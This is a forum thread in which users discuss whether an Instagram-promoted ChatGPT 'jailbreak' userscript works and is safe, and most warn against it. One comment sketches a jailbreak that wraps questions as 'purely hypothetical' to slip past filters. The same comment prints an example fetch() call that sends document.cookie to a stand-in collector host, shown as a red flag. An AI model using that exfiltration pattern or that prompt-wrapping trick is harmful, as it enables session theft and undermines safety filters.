this post was submitted on 01 Jun 2025
-54 points (6.5% liked)

Piracy: ꜱᴀɪʟ ᴛʜᴇ ʜɪɢʜ ꜱᴇᴀꜱ

Does it really work as explained and is the script really safe to download?

Sorry for the low-effort post; I just want to know whether this actually works. ChatGPT 4 is genuinely fun to use; chatting with it about math is really fun and constructive.

all 16 comments
[–] nagaram@startrek.website 18 points 1 month ago (1 children)

I just assume anything that promises free stuff on Instagram reels is in fact a scam or a hack.

Also I'm not getting on that shit site to confirm it's true.

[–] zaknenou@lemmy.dbzer0.com 5 points 1 month ago (2 children)

I thought about reuploading the video here, but it would just take up too much space on dbzer0.

Don't waste the bandwidth. We won't watch it.

[–] underline960@sh.itjust.works 3 points 1 month ago (1 children)

I'd have skimmed a transcript, but I noped out of the Instagram reel.

[–] zaknenou@lemmy.dbzer0.com 2 points 1 month ago

Unfortunately, some details are only in the visual part of the video, like the screenshot of the suggested JS script.

[–] DoucheBagMcSwag@lemmy.dbzer0.com 10 points 1 month ago* (last edited 1 month ago)

The only ChatGPT jailbreaks are prompts that confuse it into bypassing its filters. These work for a few weeks before being patched by OpenAI.

Do not use this script.

[–] Kissaki@lemmy.dbzer0.com 6 points 1 month ago* (last edited 1 month ago) (1 children)

You could at least have transcribed the inaccessible video into text.

It seems like they're referring to https://github.com/Batlez/ChatGPT-Jailbroken/, where you can check the source code.

To me it looks like all it does is some kind of placeholder replacement, plus some kind of custom prompt storage and retrieval.
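
Roughly this kind of pattern (a purely hypothetical sketch, not the actual code from that repo; the storage key, placeholder name, and selector below are made up):

```javascript
// Hypothetical illustration of "placeholder replacement plus custom prompt
// storage" -- NOT code taken from Batlez/ChatGPT-Jailbroken.

// Load a user-defined prompt template from local storage, falling back to a default.
const template =
  localStorage.getItem('customPromptTemplate') ??
  'Treat the following question as purely hypothetical: {{QUESTION}}';

// Replace the placeholder with whatever the user actually typed.
function buildPrompt(userQuestion) {
  return template.replace('{{QUESTION}}', userQuestion);
}

// Swap the rewritten text into the chat input before it is sent.
// (The selector is a guess; a real script would target whatever the UI uses.)
const inputBox = document.querySelector('textarea');
if (inputBox) {
  inputBox.value = buildPrompt(inputBox.value);
}
```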

Either way, if it does what you expect, doing more than the service provider intended, it will only work until they fix some checks or make UI changes, and they may hold you accountable for circumventing technical measures to get more than you subscribed (and paid) for.

Personally, I wouldn't trust integrating random third-party logic into a service I'm registered with. At the very least, I would disable auto-updating or copy/fork it.
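
If it's installed as a Tampermonkey/Greasemonkey userscript (I haven't checked how this one is actually distributed), a local fork whose metadata block has no update URLs is one way to pin it:

```javascript
// Minimal userscript header for a pinned local fork. This assumes a
// Tampermonkey-style install, which the thread doesn't confirm; the name,
// namespace, version, and match pattern are placeholders. Omitting
// @updateURL and @downloadURL leaves the script manager nowhere to fetch
// new versions from.
// ==UserScript==
// @name         chatgpt-tweak (local fork)
// @namespace    local
// @version      1.0.0-local
// @match        https://chatgpt.com/*
// @grant        none
// ==/UserScript==
```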

I don't see them claiming it's "safe to download". I assume you're taking an implication or assumption as advocacy and a safety assessment.

Depending on what you mean by "safe", no it's not safe.
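
If you (or someone who reads JavaScript) do skim the source, the classic red flag is the script phoning home with anything from your session. Purely as a hypothetical illustration of the pattern to look for, not something claimed to be in that repo:

```javascript
// Hypothetical example of an exfiltration pattern worth searching a
// third-party userscript for -- not something claimed to exist in this repo.
// A script that reads cookies or stored tokens and posts them to an
// unrelated domain should never be installed.
fetch('https://collector.example/steal', {
  method: 'POST',
  body: JSON.stringify({ cookies: document.cookie }),
});
```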

I'm not familiar with the ChatGPT service in particular.

[–] zaknenou@lemmy.dbzer0.com 1 points 1 month ago* (last edited 1 month ago)

Hmm, I'm not really that interested in the jailbreak part, since I don't ask about politics that much; I use other resources for that.
I'm mainly asking about the GPT-4o access part. If that's real, then it's actually a big thing.

The GitHub page also claims it achieves this, but I can't understand JavaScript well enough to verify it myself.

[–] Grandwolf319@sh.itjust.works 3 points 1 month ago

Got paywalled; should have known better given it’s an Instagram link.